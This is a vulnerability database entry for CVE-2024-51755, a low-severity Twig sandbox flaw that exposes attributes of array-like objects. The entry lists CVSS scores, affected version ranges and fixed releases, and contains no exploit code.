cbcvebase.
CVE-2024-51755
published 2024-11-06

CVE-2024-51755: Twig is a template language for PHP. In a sandbox, an attacker can access attributes of Array-like objects as they were not checked by the security policy…

PriorityP410low2.2CVSS 3.1
AVNACHPRHUINSUCLINAN
EPSS
0.41%
33.1th percentile
Twig is a template language for PHP. In a sandbox, an attacker can access attributes of Array-like objects as they were not checked by the security policy. They are now checked via the property policy and the `__isset()` method is now called after the security check. This is a BC break. This issue has been patched in versions 3.11.2 and 3.14.1. All users are advised to upgrade. There are no known workarounds for this issue.

Affected

6 ranges
VendorProductVersion rangeFixed in
debianphp-twig< php-twig 3.14.2-1 (forky)php-twig 3.14.2-1 (forky)
twigtwig>= 0 < 3.26.03.26.0
twigtwig>= 0 < 3.11.23.11.2
twigtwig>= 3.12 < 3.14.13.14.1
twigphptwig< 3.11.23.11.2
twigphptwig

CVSS provenance

nvdv3.12.2LOWCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N
ghsa2.2LOW
osv2.2LOW
vendor_debian2.2LOW
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.